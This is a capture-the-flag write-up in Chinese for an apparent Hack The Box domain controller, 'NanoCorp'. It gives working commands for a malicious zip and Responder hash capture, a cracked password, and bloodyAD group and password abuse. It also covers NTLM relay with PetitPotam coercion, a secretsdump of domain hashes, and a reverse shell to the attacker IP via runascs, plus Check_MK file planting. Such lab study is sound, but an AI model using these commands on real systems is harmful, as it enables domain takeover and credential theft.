基本信息

端口扫描

80和常规windows 域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
$ nmap -sC -sV -Pn 10.10.11.93
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-15 13:24 JST
Nmap scan report for 10.10.11.93
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://nanocorp.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-11-15 10:57:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_  http/1.1
|_http-title: Not Found
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Not valid before: 2025-04-06T22:58:43
|_Not valid after:  2026-04-06T23:18:43
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-11-15T10:57:48
|_  start_date: N/A
|_clock-skew: 6h31m38s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.48 seconds

80

需要加hosts:

1
10.10.11.93 nanocorp.htb

一个公司官网:

hire

About us里有应聘界面,是hire子域名,添加hosts后访问就是个上传简历页面,只能上传zip:

CVE-2025-24071

搜索可以找到比较新的windows zip相关漏洞:

1
sudo python3 Responder.py -i 10.10.14.2 -v

生成恶意zip,上传,得到web_svc访问:

常规破解出密码:

1
2
3
sudo hashcat -m 5600 hash.txt ~/Tools/dict/rockyou.txt

dksehdgh712!@#

bloodhound

现在有了一个账号后就先常规bloodhound收集分析:

1
2
3
4
5
6
sudo sntp -sS 10.10.11.93

# hosts
10.10.11.93 nanocorp.htb hire.nanocorp.htb dc01.nanocorp.htb dc01

bloodhound-python -u web_svc -p 'dksehdgh712!@#' -c All -d nanocorp.htb -ns 10.10.11.93 --zip

可以看到一条很明显的路径,web_svc到IT_SUPPORT组的AddSelf,然后IT_SUPPORT对MONITORING_SVC有ForceChangePassword,MONITORING_SVC又在remote management里,可以winrm登录:

web_svc to monitoring_svc

所以就是按照上面的路径一步步来,首先添加自己到IT_SUPPORT组:

1
bloodyAD --host dc01.nanocorp.htb -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' -k add groupMember IT_SUPPORT web_svc

然后强制修改monitoring_svc密码:

1
bloodyAD --host dc01.nanocorp.htb -d nanocorp.htb -u 'web_svc' -p 'dksehdgh712!@#' -k set password monitoring_svc 'Miao@123'

user flag

修改完密码后winrm登录monitoring_svc:

1
python3 winrmexec.py -ssl -port 5986 NANOCORP.HTB/monitoring_svc:'Miao@123'@dc01.nanocorp.htb -k

非预期 Relay to root

因为web_svc可以成为IT_SUPPORT成员,IT_SUPPORT可以添加dns记录,所以就可以直接relay:

1
2
3
4
5
6
7
8
# 添加dns
python3 dnstool.py -u 'nanocorp.htb\WEB_SVC' -p 'dksehdgh712!@#' nanocorp.htb -dc-ip 10.10.11.93 -dns-ip 10.10.11.93 -a add -d 10.10.14.2 -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'

# impacket ntlmrelayx
python3 examples/ntlmrelayx.py -smb2support -t winrms://10.10.11.93 -i

# 强制访问 
python3 PetitPotam.py -u web_svc -p 'dksehdgh712!@#' -d nanocorp.htb 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' dc01

hashdump

然后直接把web_svc加到domain admins,dump:

1
2
3
4
5
6
7
8
python3 examples/secretsdump.py  'nanocorp.htb/WEB_SVC':'dksehdgh712!@#'@dc01.nanocorp.htb -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:541f4c0063c05d503fd4acb87c046358:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:40a21f29fd0f5c9374ded20cb0dc9554:::
nanocorp.htb\web_svc:1103:aad3b435b51404eeaad3b435b51404ee:8c8c66765e18bd3d6720dc34ce969b85:::
nanocorp.htb\monitoring_svc:3101:aad3b435b51404eeaad3b435b51404ee:3f40355b5414ef3fe57f3cb589deeb50:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:209ce1eeeaa473fa30ea5518170d1470:::

预期 check_mk

常规枚举可以在发现check_mk service,2.1版本,存在已知漏洞:

大概就是每次启动修复程序都会运行在和PID相关的一个目录中的cmd文件,而这个目录我们可写

但服务器有杀软,所以需要自己制作运行的文件:

以及修复程序的PID范围,文章中是10000-30000,但在这台机器上多次测试是在10000以内

另外C:\windows\temp目录也是,需要runas切到web_svc账号去访问,monitoring_svc无权限

1
.\runascs.exe web_svc "dksehdgh712!@#" powershell -r 10.10.14.2:4445

然后就在所有可能的位置释放恶意文件,执行修复程序触发即可:

1
2
3
0..10000 | ? { $_ % 4 -eq 0 } | foreach {Set-Content -Path C:\Windows\Temp\cmk_all_${_}_1.cmd -Value "\windows\temp\shell.exe" -Encoding Default -Force;Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;}

ls C:\Windows\Installer\*.msi | foreach { msiexec /fa $_ }

参考资料